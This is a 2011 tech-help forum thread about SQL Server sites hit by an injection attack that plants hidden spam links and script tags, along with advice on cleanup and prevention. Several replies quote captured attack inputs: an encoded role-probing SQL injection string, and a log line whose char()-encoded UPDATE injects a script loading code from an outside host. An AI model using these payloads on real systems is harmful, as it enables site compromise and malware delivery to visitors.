Still celebrating National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17


What's causing ""-link hack?

Posted on 2011-09-13
Medium Priority
Last Modified: 2012-05-12
Look at this:

A lot of sites that have been hacked with the same hidden link to

What's causing this? How do they do it? How to prevent it?

Question by:Alfahane
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 6
  • 3
  • 2
  • +4

Expert Comment

ID: 36530606
Same question here. I appreciate a quick answer !!
Having problem with one SQL 2008 server, this server is not public accesible . Only some limited range of server can access this. Not all the servers are our server...

Can you tell what your environment is ?

Author Comment

ID: 36530772
SQL 2000

Author Comment

ID: 36530831
Do you have problems with several databases on one server only?
Automating Your MSP Business

The road to profitability.
Delivering superior services is key to ensuring customer satisfaction and the consequent long-term relationships that enable MSPs to lock in predictable, recurring revenue. What's the best way to deliver superior service? One word: automation.


Expert Comment

ID: 36531296
only one database on one server. The server has 50 databases.
The database is accessed from outside. But dont know for sure it is the external user that cause this injection or our servers.
I think (and hope) it is not one of our servers that is injecting. But i want to be sure .....

Expert Comment

ID: 36544222
Hi guys

it'll be a simple injection attack that's gotten past one of your web facing applications linking to the affected databases.. i've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, i can repair the data for you fairly quickly... just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well so this particular issue won't happen again.

All the best :)

Expert Comment

ID: 36546445
Been having the same issue for 2 days.  Not only seeing this in a sql2008 database but is adding it to files being written on our web server.   Need Help!

Expert Comment

ID: 36548523
in addition to repairing, i can set your system up to provide an immediate report via email.. some of the key things it shows are:
the attack vector (what part of your application the attacker was trying to attack),
the source ip,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding url
here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:

Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x

Open in new window


Expert Comment

ID: 36567705
A websiteof mine has been affected by this issue. I stored the datbase and ensured that ONLY parameterised queries used throughout the website.

Today the website has been targetted again, this time with:
</title><script src=></script>

There is no relevant information in the event log. Does anyone know what is causing this?

Expert Comment

ID: 36567890
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.


Accepted Solution

jdcrane earned 1125 total points
ID: 36569910
</title><a style=position:absolute;left:-9999px;top:-9999px; href= >crack</a>
</title><script src=></script>

Open in new window

There are a few things you'd need to do in order to rid yourself of the above permanently. They are:


if you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline


review yours logs to determine where the attack vector was, eg url querystring etc, it's ok if you can't see anything


review your code in detail and resolve the vulnerabilities, the location of the injected content will assist with determining where the vulnerabilities are in your application


repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred


put your site(s) back online
<advertising link removed by RockMod 20 Sept '11>

Expert Comment

ID: 36572859
For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the lisamoon hack a few months ago.

As you can see the querystring contains ASCII characters to disguise the query.

I have used a parametrised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the sqlcommand is run against the database, this does not prevent the hack.

Any ideas?

Assisted Solution

jdcrane earned 1125 total points
ID: 36573405
deploy a test version of your site and debug the same request.. i think you'll find that if this was in fact the successful injection that corrupted your system that you can't be vetting the querystring properly, also depending on how you parameterised the query or sp, it may not protect you from injection.. if databasetablename and nameofclient are literals, they have to be retrieved from somewhere, otherwise it's a remarkably accurate guess (ie you were targeted).. might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow up injections like the above
LVL 38

Assisted Solution

lherrou earned 375 total points
ID: 36573550
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc to give them access again.

Expert Comment

ID: 36597918
Would it improve matters if you restricted the number of characters in the qs parameter? IE your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.

Assisted Solution

jdcrane earned 1125 total points
ID: 36599510
if you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (eg int,intval) not the parameter directly.

if you're expecting a non numeric string literal, it's best to be fishing for sql injection symbols and halting further action upon detection of suspicious activity. if you can't post source and sample querystrings,
your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection,

Author Closing Comment

ID: 36948014
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than review our programming code more and hope that next clever hack will not come too soon.

Featured Post

Concerto's Cloud Advisory Services

Want to avoid the missteps to gaining all the benefits of the cloud? Learn more about the different assessment options from our Cloud Advisory team.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Let's recap what we learned from yesterday's Skyport Systems webinar.
This article is written by John Gates, CISSP. Gates, the SNUG President-Elect, currently holds the position of Manager of Information Systems at Lake Park High School in Roselle, Illinois.
Sending a Secure fax is easy with eFax Corporate ( First, Just open a new email message.  In the To field, type your recipient's fax number You can even send a secure international fax — just include t…
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…

722 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question